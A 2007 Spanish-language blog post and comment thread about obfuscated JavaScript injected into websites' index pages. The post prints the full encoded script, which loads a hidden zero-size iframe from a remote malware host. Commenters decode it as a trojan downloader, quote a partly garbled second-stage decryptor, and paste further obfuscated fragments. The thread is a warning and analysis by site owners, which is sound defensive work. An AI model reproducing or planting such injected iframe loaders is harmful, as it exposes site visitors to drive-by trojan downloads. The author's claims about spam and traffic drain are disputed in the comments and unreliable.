Virus para Web expandiendose por Internet
En estas ultimas semanas comenzo a ocurrir algo extraños en los sitios web de algunos que conosco y hasta algunos mios, resulta que hay un virus Troyano que esta circulando por internet y afecta justamente los index.php .index.html home.php .home.html entre otros archivos mas de web.
En que perjudica? pues hay poca informacion de este virus, en realidad esta difrazado en un JAVASCRIPT y de forma encriptada, pero personalmente y a experiencia puedo decirle que consume todo tu trafico de forma inexplicable, convierte a tu Host como un servidor de Correos Masivos(SPAM)Â y lo peor que te perjudica a ti o a tu servidor, consumiendo todo el trafico que puede.
Si eres webmaster o tienes un sitio web, y notas algo extraño en tus paginas, revisa el codigo fuente de los archivos Index que estan en tu Host, no en tu PC, en tu pc quizas esten bien, el problema es en el Host Remoto, aqui le dejo una imagen de como esta difrazado ese Virus para Web.
A experiencia propia, en una Web que tengo www.decamana.com estaban atacando constantemente con este codigo, en realidad no me explico como pudo llegar realmente a mi index, revise el codigo de mis archivos que estan en mi PC y realmente estan bien, osea limpios, pero en el Host estan infectados?¿ si alguien tiene mas informacion de esto, porfavor compartan su experiencia.
AQUI ESTA EL JAVASCRIPT
<script language=’JavaScript’> eval(unescape(’document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C100%2C100%2C111%2C115%2C109%2C97%2C110%2C97%2C103%2C101%2C114%2C46%2C111%2C114%2C103%2C47%2C116%2C100%2C115%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C48%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C48%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B’)); </script><script language=’javascript’>document.write( unescape( ‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%64%64%6F%73%6D%61%6E%61%67%65%72%2E%6F%72%67%2F%74%64%73%2F%69%66%72%61%6D%65%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E’ ) );</script><script language=’javascript’>document.write( unescape( ‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%64%64%6F%73%6D%61%6E%61%67%65%72%2E%6F%72%67%2F%74%64%73%2F%69%66%72%61%6D%65%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E’ ) );</script>
Por drakoman.com
Virus Peligroso Para Web Circula por todo el Internet // menéame dijo
6 de November del 2007 a las 5:59 pm
[…] Virus Peligroso Para Web Circula por todo el Internetwww.drakoman.com/webmaster/virus-para-web-expandiendose-por-… por drakoman hace pocos segundos […]
Marcos RamÃrez dijo
6 de November del 2007 a las 6:16 pm
Acabo de llegar a tu blog de casulidad, y tras 50 segundos, estoy en condiciones de decirte que:
ese javascript lo que hace, es crear un iframe a:
http://ddosmananager.org/tds/iframe.php
O mejor dicho, lo intenta, puesto que ese dominio, no existe.
Asi que, por favor, no seas tan alarmista con código muerto
Saludos!
jandel dijo
6 de November del 2007 a las 6:41 pm
Hola:
Te lo descifro yo mismo, es bastante básico:
eval(unescape(’document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,100,100,111,115,109,97,110,97,103,101,114,46,111,114,103,47,116,100,115,47,105,102,114,97,109,101,46,112,104,112,34,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62));’)); document.write( unescape( ‘’ ) );document.write( unescape( ‘’ ) );
Y si descifro un poco más:
eval(unescape(’document.write();’)); document.write( unescape( ‘’ ) );document.write( unescape( ‘’ ) );
Como ves son simples iframes que redirigen hacia http://ddosmanager.org/tds/iframe.php
En dicho iframe te encontrarás con otro código javascript:
function decrypt_p(x)
{var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,41,52,9,18,61,62,4,34,10,0,0,0,0,0,0,14,1,50,60,44,19,49,53,40,51,37,24,28,43,23,16,46,31,0,56,32,54,45,13,26,11,2,0,0,0,0,5,0,48,6,42,8,25,33,29,36,15,35,7,20,58,55,38,57,39,22,12,27,59,47,30,3,21,17);for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=Math.min(l,b);i>0;i–,l–){w|=(t[x.charCodeAt(p++)-48])>=8;s-=2}else{s=6}}document.write(escape(r))}}decrypt_p(”_6mMv6mMv69″)
El cual es identificado por los antivirus. Es un simple downloader/js que te descarga un troyano a tu equipo.
Saludos
jandel dijo
6 de November del 2007 a las 6:42 pm
Hola:
Te lo descifro yo mismo, es bastante básico:
script language=’JavaScript’> eval(unescape(’document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,100,100,111,115,109,97,110,97,103,101,114,46,111,114,103,47,116,100,115,47,105,102,114,97,109,101,46,112,104,112,34,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62));’)); document.write( unescape( ‘’ ) );document.write( unescape( ‘’ ) );
Y si descifro un poco más:
script language=’JavaScript’> eval(unescape(’document.write();’)); document.write( unescape( ‘’ ) );document.write( unescape( ‘’ ) );
Como ves son simples iframes que redirigen hacia http://ddosmanager.org/tds/iframe.php
En dicho iframe te encontrarás con otro código javascript:
script language=javascript>
function decrypt_p(x)
{var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,41,52,9,18,61,62,4,34,10,0,0,0,0,0,0,14,1,50,60,44,19,49,53,40,51,37,24,28,43,23,16,46,31,0,56,32,54,45,13,26,11,2,0,0,0,0,5,0,48,6,42,8,25,33,29,36,15,35,7,20,58,55,38,57,39,22,12,27,59,47,30,3,21,17);for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=Math.min(l,b);i>0;i–,l–){w|=(t[x.charCodeAt(p++)-48])>=8;s-=2}else{s=6}}document.write(escape(r))}}decrypt_p(”_6mMv6mMv69″)
El cual es identificado por los antivirus. Es un simple downloader/js que te descarga un troyano a tu equipo.
Saludos
jandel dijo
6 de November del 2007 a las 6:46 pm
Por cierto, no puedo postear el codigo completo y los iframes no aparecen en los document.write, pero vamos, son iframes a la web que he puesto
Saludos
admin dijo
6 de November del 2007 a las 7:23 pm
Que tal mis estimados amigos, pero podrian explicarme por que lo encontre en muchas paginas web, buscando en google??
Yo opino que esto se esta expandiendo en muchas web, por que lo busque y encontre muchas web, q viendo su codigo fuente estan alli!!!!!.
Otra cosa, por ese codigo esque toda la tranferencia de un hosting que tenia se acabo en 2 dias, te hablo de 4 gb, y solo teniendo como un intro q era un index.
En fin me parece extraño y revisando tdo en mi panel, encontre que el index, se consumio todo el trafico.
jandel dijo
6 de November del 2007 a las 7:52 pm
Hola:
No soy el marcos ramirez ese de meneame
En principio no hay relación entre lo que te descargas (un troyano) y que te agote la transferencia (no es un XSS ddos js).
Otra cosa es como te inyectaron el código (XSS, vulnerabilidad en aplicacion, webserver o sistema????)
En todo caso podrÃa ser al buscar vulnerabilidades en tu sitio
Saludos
caezar dijo
18 de November del 2007 a las 1:12 am
Saludos, el punto es saber como se propago este virus. El que se decifre o no me importa una mierda, no se porque insisten en decifrar, el problema es eliminar la vulnerabilidad.
Luis Gustavo - Mokewa.Net dijo
20 de December del 2007 a las 5:10 am
Hola… bueno queria ver tambien como es que se meten sin que uno les de permiso.. mmm estan en mis index y tengo que sacarlos constantemente pero igual al sacarlos vuelvo a ver al rato y siguen … que colera.. bueno aui estan estos malditos SCRIPTS que se meten por si solos son algo diferentes a los tuyos pero igual traen su troyano de melas..
___________________________________________________
function v4767f4fee9c15(v4767f4feebb56){ function v4767f4feeda94 () {var v4767f4feefaa9=16; return v4767f4feefaa9;} return(parseInt(v4767f4feebb56,v4767f4feeda94()));}function v4767f4fef1965(v4767f4fef3872){ function v4767f4ff053d7 () {var v4767f4ff07315=2; return v4767f4ff07315;} var v4767f4ff0162a=”;for(v4767f4ff0349f=0; v4767f4ff0349f
_____________________________________________
______________________________________________
function v47678929b5edf(v47678929b6e76){ function v47678929b8b38 () {return 16;} return(parseInt(v47678929b6e76,v47678929b8b38()));}function v47678929bacf3(v47678929bbca2){ var v47678929beb71=2; var v47678929bcc3a=”;for(v47678929bdbd6=0; v47678929bdbd6
________________________________________________
Bueno espero alguna ayuda ya que no se como sacarlos del todo ya prove de todas maneras y no me sale ninguna.. Gracias.. !